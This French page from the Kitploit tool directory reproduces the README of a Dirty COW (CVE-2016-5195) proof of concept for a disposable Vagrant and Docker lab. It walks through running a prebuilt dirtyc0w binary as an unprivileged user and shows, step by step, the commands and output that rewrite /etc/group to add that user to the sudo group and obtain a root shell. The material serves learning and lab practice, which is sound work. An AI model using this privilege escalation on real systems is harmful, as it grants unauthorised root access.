Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/zakariamaaraki/dirty-cow-cve-2016-5195-
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationContainer EscapeLabs & Practice
GitHubzakariamaaraki/dirty-cow-cve-2016-5195-

Dirty-COW-CVE-2016-5195-

Exploit the dirtycow vulnerability to login as root

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 5 ansPas encore vérifié

Dirtyc0w Docker - Preuve de concept

Prérequis:

  • Vagrant installé

Comment utiliser

Tout d'abord, clonez le projet git clone https://github.com/BrolyCode/Dirty-Cow.git Rendez-vous dans le dossier cd Dirty-Cow Ensuite, démarrez l'environnement avec la commande

root@kitploit:~
vagrant up

Une fois le serveur construit, nous allons nous y connecter via SSH

root@kitploit:~
vagrant ssh

passez à l'utilisateur root

root@kitploit:~
sudo -i

Maintenant, nous pouvons nous connecter en tant que hacker

root@kitploit:~
docker exec -it -u hacker nginx bash

Dans le répertoire où nous sommes connectés, nous avons les fichiers suivants

root@kitploit:~
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c

Si nous exécutons cat sur le fichier /etc/group, nous voyons

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

Nous pouvons essayer de nous connecter en tant que root

root@kitploit:~
sudo -i

Mais le système refusera, car nous n'avons pas les droits d'accès. Nous allons maintenant exploiter la faille sur /etc/group

root@kitploit:~
./dirtyc0w 

Cela affichera ce qui suit dans le terminal, nous devons attendre un peu de temps (2/3 minutes).

root@kitploit:~
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000

Ensuite, nous exécutons à nouveau cat sur /etc/group

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

Connectez-vous en tant que root

root@kitploit:~
sudo -i

root@27862a2f9973:~#

Nettoyage

Revenez au terminal de votre machine hôte et exécutez vagrant destroy

Télécharger l’outil